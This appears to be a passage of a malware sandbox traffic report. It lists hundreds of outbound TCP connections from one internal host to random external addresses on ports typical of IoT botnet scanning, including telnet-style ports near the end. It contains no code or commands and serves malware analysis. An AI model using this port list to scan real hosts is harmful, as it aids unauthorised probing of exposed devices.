Source: global traffic TCP traffic: 192.168.2.23:51292 -> 219.44.149.12:49152
Source: global traffic TCP traffic: 192.168.2.23:60694 -> 145.115.91.50:81
Source: global traffic TCP traffic: 192.168.2.23:45460 -> 122.120.11.163:49152
Source: global traffic TCP traffic: 192.168.2.23:35052 -> 81.79.57.93:49152
Source: global traffic TCP traffic: 192.168.2.23:50622 -> 203.222.143.94:8080
Source: global traffic TCP traffic: 192.168.2.23:42000 -> 120.185.75.38:52869
Source: global traffic TCP traffic: 192.168.2.23:48856 -> 89.109.107.87:5555
Source: global traffic TCP traffic: 192.168.2.23:60210 -> 104.69.106.155:81
Source: global traffic TCP traffic: 192.168.2.23:43618 -> 33.219.124.225:8080
Source: global traffic TCP traffic: 192.168.2.23:56282 -> 49.60.182.140:8080
Source: global traffic TCP traffic: 192.168.2.23:36294 -> 106.178.208.243:8080
Source: global traffic TCP traffic: 192.168.2.23:38484 -> 162.119.193.156:7574
Source: global traffic TCP traffic: 192.168.2.23:40120 -> 87.27.190.244:37215
Source: global traffic TCP traffic: 192.168.2.23:44642 -> 126.144.178.253:8443
Source: global traffic TCP traffic: 192.168.2.23:60954 -> 119.236.192.141:37215
Source: global traffic TCP traffic: 192.168.2.23:51592 -> 4.63.252.30:8080
Source: global traffic TCP traffic: 192.168.2.23:53468 -> 54.122.133.187:37215
Source: global traffic TCP traffic: 192.168.2.23:35270 -> 27.49.23.52:49152
Source: global traffic TCP traffic: 192.168.2.23:34590 -> 65.177.53.188:7574
Source: global traffic TCP traffic: 192.168.2.23:54270 -> 72.151.192.215:8080
Source: global traffic TCP traffic: 192.168.2.23:33902 -> 137.207.100.87:8443
Source: global traffic TCP traffic: 192.168.2.23:43854 -> 8.96.114.127:37215
Source: global traffic TCP traffic: 192.168.2.23:33356 -> 75.118.139.121:81
Source: global traffic TCP traffic: 192.168.2.23:56570 -> 126.130.134.110:5555
Source: global traffic TCP traffic: 192.168.2.23:36466 -> 169.173.175.187:81
Source: global traffic TCP traffic: 192.168.2.23:42176 -> 219.210.250.186:7574
Source: global traffic TCP traffic: 192.168.2.23:51170 -> 25.224.91.27:37215
Source: global traffic TCP traffic: 192.168.2.23:54970 -> 12.93.192.60:7574
Source: global traffic TCP traffic: 192.168.2.23:57152 -> 83.219.142.62:8080
Source: global traffic TCP traffic: 192.168.2.23:51284 -> 207.19.171.61:7574
Source: global traffic TCP traffic: 192.168.2.23:36866 -> 197.34.33.4:49152
Source: global traffic TCP traffic: 192.168.2.23:46144 -> 115.149.26.31:7574
Source: global traffic TCP traffic: 192.168.2.23:47296 -> 123.193.230.204:37215
Source: global traffic TCP traffic: 192.168.2.23:43412 -> 1.102.177.191:49152
Source: global traffic TCP traffic: 192.168.2.23:55832 -> 205.138.220.164:81
Source: global traffic TCP traffic: 192.168.2.23:58176 -> 60.91.131.86:52869
Source: global traffic TCP traffic: 192.168.2.23:56040 -> 175.195.226.130:52869
Source: global traffic TCP traffic: 192.168.2.23:34414 -> 116.102.42.120:8080
Source: global traffic TCP traffic: 192.168.2.23:38690 -> 58.170.123.16:37215
Source: global traffic TCP traffic: 192.168.2.23:59552 -> 146.15.194.66:8080
Source: global traffic TCP traffic: 192.168.2.23:52244 -> 152.79.242.212:52869
Source: global traffic TCP traffic: 192.168.2.23:56284 -> 13.169.176.0:81
Source: global traffic TCP traffic: 192.168.2.23:42034 -> 145.78.150.14:52869
Source: global traffic TCP traffic: 192.168.2.23:53522 -> 13.156.98.231:37215
Source: global traffic TCP traffic: 192.168.2.23:50434 -> 147.118.25.160:8080
Source: global traffic TCP traffic: 192.168.2.23:36548 -> 194.212.2.39:8443
Source: global traffic TCP traffic: 192.168.2.23:59884 -> 87.59.59.83:49152
Source: global traffic TCP traffic: 192.168.2.23:43982 -> 217.167.178.11:81
Source: global traffic TCP traffic: 192.168.2.23:35682 -> 76.169.13.149:8443
Source: global traffic TCP traffic: 192.168.2.23:50774 -> 222.215.11.152:5555
Source: global traffic TCP traffic: 192.168.2.23:34392 -> 78.23.102.210:8080
Source: global traffic TCP traffic: 192.168.2.23:46386 -> 102.214.134.194:8443
Source: global traffic TCP traffic: 192.168.2.23:57706 -> 145.137.120.154:8080
Source: global traffic TCP traffic: 192.168.2.23:53496 -> 152.90.219.150:49152
Source: global traffic TCP traffic: 192.168.2.23:33080 -> 121.217.30.81:8443
Source: global traffic TCP traffic: 192.168.2.23:55418 -> 61.60.90.55:81
Source: global traffic TCP traffic: 192.168.2.23:48136 -> 207.174.76.62:8080
Source: global traffic TCP traffic: 192.168.2.23:47076 -> 99.175.24.226:8443
Source: global traffic TCP traffic: 192.168.2.23:39840 -> 54.239.14.65:8080
Source: global traffic TCP traffic: 192.168.2.23:55352 -> 188.227.158.27:5555
Source: global traffic TCP traffic: 192.168.2.23:55068 -> 177.40.229.174:8080
Source: global traffic TCP traffic: 192.168.2.23:37154 -> 46.240.25.117:8443
Source: global traffic TCP traffic: 192.168.2.23:42274 -> 122.173.242.132:7574
Source: global traffic TCP traffic: 192.168.2.23:48528 -> 81.78.52.168:49152
Source: global traffic TCP traffic: 192.168.2.23:40772 -> 47.57.146.158:49152
Source: global traffic TCP traffic: 192.168.2.23:40614 -> 130.120.24.197:7574
Source: global traffic TCP traffic: 192.168.2.23:39650 -> 166.236.5.250:49152
Source: global traffic TCP traffic: 192.168.2.23:53784 -> 149.186.69.66:8080
Source: global traffic TCP traffic: 192.168.2.23:43918 -> 152.114.237.184:8443
Source: global traffic TCP traffic: 192.168.2.23:55114 -> 83.199.233.176:49152
Source: global traffic TCP traffic: 192.168.2.23:34338 -> 130.102.160.74:49152
Source: global traffic TCP traffic: 192.168.2.23:48572 -> 83.122.95.25:8080
Source: global traffic TCP traffic: 192.168.2.23:54086 -> 183.127.20.248:7574
Source: global traffic TCP traffic: 192.168.2.23:37316 -> 126.129.153.234:8443
Source: global traffic TCP traffic: 192.168.2.23:36330 -> 89.43.178.168:7574
Source: global traffic TCP traffic: 192.168.2.23:58492 -> 101.60.186.9:81
Source: global traffic TCP traffic: 192.168.2.23:58570 -> 117.37.15.228:5555
Source: global traffic TCP traffic: 192.168.2.23:53928 -> 105.242.110.44:52869
Source: global traffic TCP traffic: 192.168.2.23:35810 -> 17.202.225.253:37215
Source: global traffic TCP traffic: 192.168.2.23:45248 -> 9.46.120.73:5555
Source: global traffic TCP traffic: 192.168.2.23:39956 -> 59.226.146.96:8080
Source: global traffic TCP traffic: 192.168.2.23:46734 -> 43.120.175.110:7574
Source: global traffic TCP traffic: 192.168.2.23:54376 -> 31.156.62.140:8443
Source: global traffic TCP traffic: 192.168.2.23:59874 -> 124.242.109.222:37215
Source: global traffic TCP traffic: 192.168.2.23:54448 -> 92.100.0.194:7574
Source: global traffic TCP traffic: 192.168.2.23:46262 -> 11.35.71.45:81
Source: global traffic TCP traffic: 192.168.2.23:51938 -> 24.1.57.126:52869
Source: global traffic TCP traffic: 192.168.2.23:56210 -> 96.235.20.121:8080
Source: global traffic TCP traffic: 192.168.2.23:42184 -> 151.21.199.120:5555
Source: global traffic TCP traffic: 192.168.2.23:49564 -> 25.87.237.51:52869
Source: global traffic TCP traffic: 192.168.2.23:43624 -> 66.114.253.203:8443
Source: global traffic TCP traffic: 192.168.2.23:46848 -> 130.111.55.248:8080
Source: global traffic TCP traffic: 192.168.2.23:54586 -> 17.229.113.84:49152
Source: global traffic TCP traffic: 192.168.2.23:55462 -> 133.165.216.47:37215
Source: global traffic TCP traffic: 192.168.2.23:57270 -> 189.247.217.62:5555
Source: global traffic TCP traffic: 192.168.2.23:46802 -> 82.116.24.152:8443
Source: global traffic TCP traffic: 192.168.2.23:33576 -> 25.87.53.113:8080
Source: global traffic TCP traffic: 192.168.2.23:47928 -> 159.42.57.237:49152
Source: global traffic TCP traffic: 192.168.2.23:39132 -> 220.139.122.238:8443
Source: global traffic TCP traffic: 192.168.2.23:48918 -> 60.138.201.97:52869
Source: global traffic TCP traffic: 192.168.2.23:45688 -> 194.204.98.109:49152
Source: global traffic TCP traffic: 192.168.2.23:38136 -> 8.209.26.108:8080
Source: global traffic TCP traffic: 192.168.2.23:57852 -> 115.232.98.88:81
Source: global traffic TCP traffic: 192.168.2.23:48388 -> 145.55.30.154:7574
Source: global traffic TCP traffic: 192.168.2.23:51792 -> 83.22.235.193:8080
Source: global traffic TCP traffic: 192.168.2.23:50816 -> 175.22.201.208:8443
Source: global traffic TCP traffic: 192.168.2.23:41150 -> 88.103.118.246:52869
Source: global traffic TCP traffic: 192.168.2.23:58952 -> 163.96.184.101:5555
Source: global traffic TCP traffic: 192.168.2.23:52400 -> 122.36.114.106:49152
Source: global traffic TCP traffic: 192.168.2.23:50268 -> 30.101.205.242:49152
Source: global traffic TCP traffic: 192.168.2.23:46854 -> 132.219.186.30:8443
Source: global traffic TCP traffic: 192.168.2.23:37044 -> 21.203.17.96:8080
Source: global traffic TCP traffic: 192.168.2.23:44348 -> 31.182.206.13:8080
Source: global traffic TCP traffic: 192.168.2.23:33436 -> 71.10.2.3:52869
Source: global traffic TCP traffic: 192.168.2.23:43158 -> 180.167.207.34:81
Source: global traffic TCP traffic: 192.168.2.23:55370 -> 205.155.133.95:52869
Source: global traffic TCP traffic: 192.168.2.23:50800 -> 184.245.192.241:8443
Source: global traffic TCP traffic: 192.168.2.23:35286 -> 75.61.94.118:8080
Source: global traffic TCP traffic: 192.168.2.23:47884 -> 187.37.64.91:8080
Source: global traffic TCP traffic: 192.168.2.23:58054 -> 42.127.221.91:7574
Source: global traffic TCP traffic: 192.168.2.23:37386 -> 150.179.62.203:52869
Source: global traffic TCP traffic: 192.168.2.23:49404 -> 29.49.149.205:8080
Source: global traffic TCP traffic: 192.168.2.23:60978 -> 86.218.33.164:8080
Source: global traffic TCP traffic: 192.168.2.23:60300 -> 211.199.132.181:81
Source: global traffic TCP traffic: 192.168.2.23:59334 -> 145.76.97.152:8080
Source: global traffic TCP traffic: 192.168.2.23:39052 -> 28.212.76.191:81
Source: global traffic TCP traffic: 192.168.2.23:46556 -> 45.60.67.75:52869
Source: global traffic TCP traffic: 192.168.2.23:49442 -> 154.137.192.46:8080
Source: global traffic TCP traffic: 192.168.2.23:45272 -> 183.56.193.84:49152
Source: global traffic TCP traffic: 192.168.2.23:41866 -> 198.200.177.227:7574
Source: global traffic TCP traffic: 192.168.2.23:36018 -> 98.248.158.185:8080
Source: global traffic TCP traffic: 192.168.2.23:46932 -> 46.208.194.138:52869
Source: global traffic TCP traffic: 192.168.2.23:34928 -> 79.238.9.113:81
Source: global traffic TCP traffic: 192.168.2.23:41954 -> 82.109.48.98:8443
Source: global traffic TCP traffic: 192.168.2.23:38202 -> 110.33.28.139:8080
Source: global traffic TCP traffic: 192.168.2.23:60384 -> 155.163.154.83:81
Source: global traffic TCP traffic: 192.168.2.23:56156 -> 5.159.128.139:49152
Source: global traffic TCP traffic: 192.168.2.23:60500 -> 49.167.144.85:81
Source: global traffic TCP traffic: 192.168.2.23:47954 -> 97.132.168.27:37215
Source: global traffic TCP traffic: 192.168.2.23:54200 -> 118.51.93.48:81
Source: global traffic TCP traffic: 192.168.2.23:48250 -> 57.37.42.243:5555
Source: global traffic TCP traffic: 192.168.2.23:40758 -> 119.44.231.19:52869
Source: global traffic TCP traffic: 192.168.2.23:46212 -> 179.76.176.91:8080
Source: global traffic TCP traffic: 192.168.2.23:34938 -> 120.81.95.181:8080
Source: global traffic TCP traffic: 192.168.2.23:56180 -> 168.48.142.0:81
Source: global traffic TCP traffic: 192.168.2.23:55754 -> 179.82.28.238:81
Source: global traffic TCP traffic: 192.168.2.23:47164 -> 217.41.84.108:7574
Source: global traffic TCP traffic: 192.168.2.23:54920 -> 176.181.36.227:8443
Source: global traffic TCP traffic: 192.168.2.23:47796 -> 174.117.110.102:8080
Source: global traffic TCP traffic: 192.168.2.23:46974 -> 214.65.33.92:7574
Source: global traffic TCP traffic: 192.168.2.23:59426 -> 6.106.185.52:81
Source: global traffic TCP traffic: 192.168.2.23:41420 -> 95.44.206.204:8080
Source: global traffic TCP traffic: 192.168.2.23:50222 -> 143.222.121.131:8080
Source: global traffic TCP traffic: 192.168.2.23:47828 -> 164.68.125.39:8443
Source: global traffic TCP traffic: 192.168.2.23:41100 -> 68.182.20.215:8080
Source: global traffic TCP traffic: 192.168.2.23:33006 -> 15.115.219.33:8080
Source: global traffic TCP traffic: 192.168.2.23:43442 -> 138.81.221.137:49152
Source: global traffic TCP traffic: 192.168.2.23:60426 -> 4.178.77.136:49152
Source: global traffic TCP traffic: 192.168.2.23:55836 -> 111.99.86.156:8080
Source: global traffic TCP traffic: 192.168.2.23:45146 -> 121.219.237.97:81
Source: global traffic TCP traffic: 192.168.2.23:58004 -> 56.116.63.156:8080
Source: global traffic TCP traffic: 192.168.2.23:35940 -> 83.41.162.42:37215
Source: global traffic TCP traffic: 192.168.2.23:55136 -> 181.33.185.159:8080
Source: global traffic TCP traffic: 192.168.2.23:45594 -> 213.118.54.42:8080
Source: global traffic TCP traffic: 192.168.2.23:37082 -> 135.167.144.117:8443
Source: global traffic TCP traffic: 192.168.2.23:46942 -> 71.242.41.195:7574
Source: global traffic TCP traffic: 192.168.2.23:57760 -> 204.137.215.190:8080
Source: global traffic TCP traffic: 192.168.2.23:41600 -> 200.198.64.123:81
Source: global traffic TCP traffic: 192.168.2.23:39322 -> 60.39.118.49:37215
Source: global traffic TCP traffic: 192.168.2.23:53444 -> 45.145.162.29:49152
Source: global traffic TCP traffic: 192.168.2.23:53968 -> 145.223.11.43:8080
Source: global traffic TCP traffic: 192.168.2.23:55614 -> 105.182.26.182:8443
Source: global traffic TCP traffic: 192.168.2.23:52128 -> 9.243.211.10:8080
Source: global traffic TCP traffic: 192.168.2.23:51920 -> 131.207.86.145:8080
Source: global traffic TCP traffic: 192.168.2.23:44304 -> 147.242.54.19:52869
Source: global traffic TCP traffic: 192.168.2.23:39560 -> 20.117.146.33:7574
Source: global traffic TCP traffic: 192.168.2.23:41128 -> 161.49.171.223:7574
Source: global traffic TCP traffic: 192.168.2.23:46458 -> 198.71.123.155:8443
Source: global traffic TCP traffic: 192.168.2.23:38558 -> 138.152.205.148:8080
Source: global traffic TCP traffic: 192.168.2.23:41612 -> 178.252.192.130:37215
Source: global traffic TCP traffic: 192.168.2.23:54770 -> 120.234.0.119:37215
Source: global traffic TCP traffic: 192.168.2.23:38322 -> 11.66.7.4:8080
Source: global traffic TCP traffic: 192.168.2.23:39852 -> 203.103.244.44:5555
Source: global traffic TCP traffic: 192.168.2.23:42006 -> 46.224.230.213:7574
Source: global traffic TCP traffic: 192.168.2.23:47928 -> 8.33.31.17:49152
Source: global traffic TCP traffic: 192.168.2.23:37938 -> 23.136.14.234:8080
Source: global traffic TCP traffic: 192.168.2.23:34706 -> 221.126.105.14:49152
Source: global traffic TCP traffic: 192.168.2.23:47416 -> 145.20.161.88:52869
Source: global traffic TCP traffic: 192.168.2.23:50968 -> 78.209.10.212:8443
Source: global traffic TCP traffic: 192.168.2.23:41190 -> 33.162.5.64:37215
Source: global traffic TCP traffic: 192.168.2.23:48016 -> 133.91.142.122:8080
Source: global traffic TCP traffic: 192.168.2.23:45148 -> 198.195.107.231:37215
Source: global traffic TCP traffic: 192.168.2.23:36540 -> 212.156.248.205:8080
Source: global traffic TCP traffic: 192.168.2.23:38692 -> 99.136.127.2:8080
Source: global traffic TCP traffic: 192.168.2.23:53768 -> 143.54.177.24:37215
Source: global traffic TCP traffic: 192.168.2.23:44880 -> 11.174.186.112:49152
Source: global traffic TCP traffic: 192.168.2.23:49848 -> 34.235.160.60:49152
Source: global traffic TCP traffic: 192.168.2.23:58636 -> 80.55.28.151:5555
Source: global traffic TCP traffic: 192.168.2.23:55046 -> 92.66.154.32:52869
Source: global traffic TCP traffic: 192.168.2.23:58820 -> 209.94.249.210:8080
Source: global traffic TCP traffic: 192.168.2.23:37492 -> 33.139.95.124:8443
Source: global traffic TCP traffic: 192.168.2.23:52162 -> 40.233.243.160:8080
Source: global traffic TCP traffic: 192.168.2.23:58036 -> 12.61.228.207:5555
Source: global traffic TCP traffic: 192.168.2.23:39396 -> 44.68.97.207:8080
Source: global traffic TCP traffic: 192.168.2.23:53872 -> 39.170.132.129:8443
Source: global traffic TCP traffic: 192.168.2.23:46282 -> 183.127.231.20:8080
Source: global traffic TCP traffic: 192.168.2.23:40196 -> 185.130.129.20:5555
Source: global traffic TCP traffic: 192.168.2.23:41488 -> 48.169.95.198:81
Source: global traffic TCP traffic: 192.168.2.23:49772 -> 105.188.53.103:52869
Source: global traffic TCP traffic: 192.168.2.23:39268 -> 205.236.127.249:8080
Source: global traffic TCP traffic: 192.168.2.23:50190 -> 93.51.81.184:52869
Source: global traffic TCP traffic: 192.168.2.23:47630 -> 38.23.18.254:8080
Source: global traffic TCP traffic: 192.168.2.23:55444 -> 17.82.190.143:5555
Source: global traffic TCP traffic: 192.168.2.23:36210 -> 177.39.137.239:5555
Source: global traffic TCP traffic: 192.168.2.23:37228 -> 69.124.104.165:7574
Source: global traffic TCP traffic: 192.168.2.23:34636 -> 197.43.185.122:37215
Source: global traffic TCP traffic: 192.168.2.23:48156 -> 104.212.206.20:81
Source: global traffic TCP traffic: 192.168.2.23:51530 -> 84.244.40.210:81
Source: global traffic TCP traffic: 192.168.2.23:51326 -> 61.99.62.50:8080
Source: global traffic TCP traffic: 192.168.2.23:39534 -> 163.60.233.12:8080
Source: global traffic TCP traffic: 192.168.2.23:41820 -> 169.46.35.113:5555
Source: global traffic TCP traffic: 192.168.2.23:38410 -> 204.237.78.26:81
Source: global traffic TCP traffic: 192.168.2.23:38788 -> 47.177.12.156:8080
Source: global traffic TCP traffic: 192.168.2.23:52008 -> 1.224.209.95:49152
Source: global traffic TCP traffic: 192.168.2.23:45504 -> 90.195.169.147:81
Source: global traffic TCP traffic: 192.168.2.23:47198 -> 53.235.12.8:81
Source: global traffic TCP traffic: 192.168.2.23:49516 -> 166.92.12.100:49152
Source: global traffic TCP traffic: 192.168.2.23:33430 -> 46.233.176.54:81
Source: global traffic TCP traffic: 192.168.2.23:43462 -> 139.235.155.108:52869
Source: global traffic TCP traffic: 192.168.2.23:60168 -> 169.240.44.151:37215
Source: global traffic TCP traffic: 192.168.2.23:44646 -> 51.88.106.9:8443
Source: global traffic TCP traffic: 192.168.2.23:53694 -> 204.100.68.194:8080
Source: global traffic TCP traffic: 192.168.2.23:42456 -> 211.183.25.135:49152
Source: global traffic TCP traffic: 192.168.2.23:46746 -> 142.131.34.237:8080
Source: global traffic TCP traffic: 192.168.2.23:57418 -> 45.160.19.108:81
Source: global traffic TCP traffic: 192.168.2.23:51732 -> 139.214.25.175:81
Source: global traffic TCP traffic: 192.168.2.23:40984 -> 48.22.187.35:8080
Source: global traffic TCP traffic: 192.168.2.23:34712 -> 94.189.103.10:8443
Source: global traffic TCP traffic: 192.168.2.23:40628 -> 134.162.101.169:8080
Source: global traffic TCP traffic: 192.168.2.23:39634 -> 49.203.225.59:8080
Source: global traffic TCP traffic: 192.168.2.23:37086 -> 156.170.6.10:8080
Source: global traffic TCP traffic: 192.168.2.23:40410 -> 142.228.181.74:81
Source: global traffic TCP traffic: 192.168.2.23:46004 -> 67.112.144.22:8080
Source: global traffic TCP traffic: 192.168.2.23:45840 -> 58.144.222.191:8443
Source: global traffic TCP traffic: 192.168.2.23:53836 -> 147.153.184.105:8080
Source: global traffic TCP traffic: 192.168.2.23:56100 -> 35.197.34.30:8080
Source: global traffic TCP traffic: 192.168.2.23:51956 -> 215.221.225.114:7574
Source: global traffic TCP traffic: 192.168.2.23:55920 -> 104.86.216.214:37215
Source: global traffic TCP traffic: 192.168.2.23:48850 -> 90.198.227.113:49152
Source: global traffic TCP traffic: 192.168.2.23:42412 -> 193.141.57.151:8443
Source: global traffic TCP traffic: 192.168.2.23:55318 -> 219.15.211.177:81
Source: global traffic TCP traffic: 192.168.2.23:40746 -> 77.234.2.16:8443
Source: global traffic TCP traffic: 192.168.2.23:51386 -> 119.163.0.210:52869
Source: global traffic TCP traffic: 192.168.2.23:48256 -> 188.141.179.11:8080
Source: global traffic TCP traffic: 192.168.2.23:53804 -> 175.94.72.226:8080
Source: global traffic TCP traffic: 192.168.2.23:59966 -> 27.133.206.197:8443
Source: global traffic TCP traffic: 192.168.2.23:44598 -> 33.102.102.107:8080
Source: global traffic TCP traffic: 192.168.2.23:53226 -> 50.106.240.52:8080
Source: global traffic TCP traffic: 192.168.2.23:47126 -> 154.158.78.54:8080
Source: global traffic TCP traffic: 192.168.2.23:56266 -> 137.242.74.67:52869
Source: global traffic TCP traffic: 192.168.2.23:53380 -> 19.34.231.37:5555
Source: global traffic TCP traffic: 192.168.2.23:38698 -> 128.34.207.209:7574
Source: global traffic TCP traffic: 192.168.2.23:44212 -> 87.133.8.240:8080
Source: global traffic TCP traffic: 192.168.2.23:43418 -> 148.8.99.90:8080
Source: global traffic TCP traffic: 192.168.2.23:33860 -> 77.23.20.10:52869
Source: global traffic TCP traffic: 192.168.2.23:55178 -> 67.56.126.36:37215
Source: global traffic TCP traffic: 192.168.2.23:60350 -> 179.90.18.98:7574
Source: global traffic TCP traffic: 192.168.2.23:41966 -> 133.221.50.0:5555
Source: global traffic TCP traffic: 192.168.2.23:39014 -> 165.213.73.162:37215
Source: global traffic TCP traffic: 192.168.2.23:37708 -> 46.59.35.45:8080
Source: global traffic TCP traffic: 192.168.2.23:38216 -> 59.119.205.68:8080
Source: global traffic TCP traffic: 192.168.2.23:50072 -> 125.85.219.249:8443
Source: global traffic TCP traffic: 192.168.2.23:59566 -> 36.141.47.147:5555
Source: global traffic TCP traffic: 192.168.2.23:60916 -> 122.169.100.235:7574
Source: global traffic TCP traffic: 192.168.2.23:37306 -> 33.38.63.31:52869
Source: global traffic TCP traffic: 192.168.2.23:51626 -> 179.220.108.237:49152
Source: global traffic TCP traffic: 192.168.2.23:58450 -> 30.56.166.237:8080
Source: global traffic TCP traffic: 192.168.2.23:58384 -> 76.187.121.117:5555
Source: global traffic TCP traffic: 192.168.2.23:56638 -> 149.224.12.120:52869
Source: global traffic TCP traffic: 192.168.2.23:36180 -> 38.14.27.183:8080
Source: global traffic TCP traffic: 192.168.2.23:34580 -> 75.129.81.88:8080
Source: global traffic TCP traffic: 192.168.2.23:40420 -> 141.147.122.73:52869
Source: global traffic TCP traffic: 192.168.2.23:53864 -> 124.74.51.149:5555
Source: global traffic TCP traffic: 192.168.2.23:43188 -> 92.73.131.217:8080
Source: global traffic TCP traffic: 192.168.2.23:58044 -> 39.212.16.20:49152
Source: global traffic TCP traffic: 192.168.2.23:53178 -> 170.248.33.117:37215
Source: global traffic TCP traffic: 192.168.2.23:46344 -> 26.191.178.191:81
Source: global traffic TCP traffic: 192.168.2.23:46374 -> 83.120.45.138:49152
Source: global traffic TCP traffic: 192.168.2.23:48128 -> 1.92.53.143:8080
Source: global traffic TCP traffic: 192.168.2.23:50416 -> 188.90.174.120:52869
Source: global traffic TCP traffic: 192.168.2.23:58366 -> 20.236.23.34:8080
Source: global traffic TCP traffic: 192.168.2.23:46916 -> 87.55.175.136:8080
Source: global traffic TCP traffic: 192.168.2.23:48772 -> 51.133.94.169:5555
Source: global traffic TCP traffic: 192.168.2.23:46998 -> 8.236.6.123:81
Source: global traffic TCP traffic: 192.168.2.23:51178 -> 98.210.110.203:8080
Source: global traffic TCP traffic: 192.168.2.23:36010 -> 87.24.204.138:5555
Source: global traffic TCP traffic: 192.168.2.23:48112 -> 77.65.129.42:8080
Source: global traffic TCP traffic: 192.168.2.23:32954 -> 218.120.200.65:81
Source: global traffic TCP traffic: 192.168.2.23:48750 -> 9.112.187.214:8080
Source: global traffic TCP traffic: 192.168.2.23:41978 -> 196.243.30.187:7574
Source: global traffic TCP traffic: 192.168.2.23:45936 -> 115.204.99.250:8080
Source: global traffic TCP traffic: 192.168.2.23:34236 -> 216.95.248.119:8080
Source: global traffic TCP traffic: 192.168.2.23:57262 -> 115.128.48.99:52869
Source: global traffic TCP traffic: 192.168.2.23:38952 -> 38.8.0.209:5555
Source: global traffic TCP traffic: 192.168.2.23:60762 -> 186.112.97.51:8080
Source: global traffic TCP traffic: 192.168.2.23:39442 -> 139.98.240.226:8443
Source: global traffic TCP traffic: 192.168.2.23:44376 -> 78.43.121.154:7574
Source: global traffic TCP traffic: 192.168.2.23:46492 -> 29.5.24.149:8080
Source: global traffic TCP traffic: 192.168.2.23:49832 -> 120.184.29.196:52869
Source: global traffic TCP traffic: 192.168.2.23:43260 -> 79.115.136.43:49152
Source: global traffic TCP traffic: 192.168.2.23:35434 -> 154.227.186.158:37215
Source: global traffic TCP traffic: 192.168.2.23:41564 -> 210.162.131.189:37215
Source: global traffic TCP traffic: 192.168.2.23:52764 -> 158.128.123.165:5555
Source: global traffic TCP traffic: 192.168.2.23:38600 -> 148.94.12.246:81
Source: global traffic TCP traffic: 192.168.2.23:46986 -> 85.37.127.109:8443
Source: global traffic TCP traffic: 192.168.2.23:41192 -> 102.181.38.0:7574
Source: global traffic TCP traffic: 192.168.2.23:41106 -> 163.186.204.190:5555
Source: global traffic TCP traffic: 192.168.2.23:35780 -> 29.146.1.94:49152
Source: global traffic TCP traffic: 192.168.2.23:57048 -> 17.11.119.17:8080
Source: global traffic TCP traffic: 192.168.2.23:42946 -> 38.236.153.237:8443
Source: global traffic TCP traffic: 192.168.2.23:43738 -> 65.39.159.210:81
Source: global traffic TCP traffic: 192.168.2.23:51958 -> 5.30.108.246:52869
Source: global traffic TCP traffic: 192.168.2.23:47298 -> 190.30.220.5:81
Source: global traffic TCP traffic: 192.168.2.23:49340 -> 144.160.155.179:5555
Source: global traffic TCP traffic: 192.168.2.23:58056 -> 156.225.166.184:37215
Source: global traffic TCP traffic: 192.168.2.23:54508 -> 201.27.197.75:37215
Source: global traffic TCP traffic: 192.168.2.23:52000 -> 54.1.124.25:37215
Source: global traffic TCP traffic: 192.168.2.23:50138 -> 64.226.73.229:8080
Source: global traffic TCP traffic: 192.168.2.23:54484 -> 193.40.3.49:8080
Source: global traffic TCP traffic: 192.168.2.23:38206 -> 34.159.133.139:8080
Source: global traffic TCP traffic: 192.168.2.23:33524 -> 128.182.134.209:81
Source: global traffic TCP traffic: 192.168.2.23:53726 -> 41.1.30.61:37215
Source: global traffic TCP traffic: 192.168.2.23:52966 -> 154.192.176.198:52869
Source: global traffic TCP traffic: 192.168.2.23:53448 -> 128.218.150.32:52869
Source: global traffic TCP traffic: 192.168.2.23:54898 -> 177.209.226.139:8443
Source: global traffic TCP traffic: 192.168.2.23:35840 -> 211.220.38.99:8080
Source: global traffic TCP traffic: 192.168.2.23:36060 -> 41.110.5.76:8080
Source: global traffic TCP traffic: 192.168.2.23:47258 -> 46.254.241.45:37215
Source: global traffic TCP traffic: 192.168.2.23:44852 -> 186.13.189.220:37215
Source: global traffic TCP traffic: 192.168.2.23:57598 -> 43.171.34.211:8080
Source: global traffic TCP traffic: 192.168.2.23:52292 -> 147.217.48.114:81
Source: global traffic TCP traffic: 192.168.2.23:57142 -> 168.21.138.88:37215
Source: global traffic TCP traffic: 192.168.2.23:47872 -> 147.104.119.10:8080
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 117.85.193.250:1023
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 162.201.103.19:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 141.93.255.75:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 196.93.19.115:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 155.244.216.255:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 93.126.167.188:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 102.12.129.238:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 9.162.126.235:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 222.107.223.52:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 118.160.36.76:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 210.150.13.121:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 72.105.117.1:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 132.254.193.87:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 125.178.34.206:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 178.144.58.66:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 179.40.119.240:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 208.146.95.90:1023
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 61.188.82.153:1023
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 46.233.10.3:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 62.91.253.57:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 190.140.82.201:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 107.162.234.59:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 160.96.199.194:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 67.148.132.72:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 180.67.121.81:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 165.3.134.117:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 91.212.102.101:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 71.241.250.217:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 186.67.255.20:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 116.169.136.8:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 180.40.185.213:1023
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 104.14.17.218:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 122.250.86.162:2323
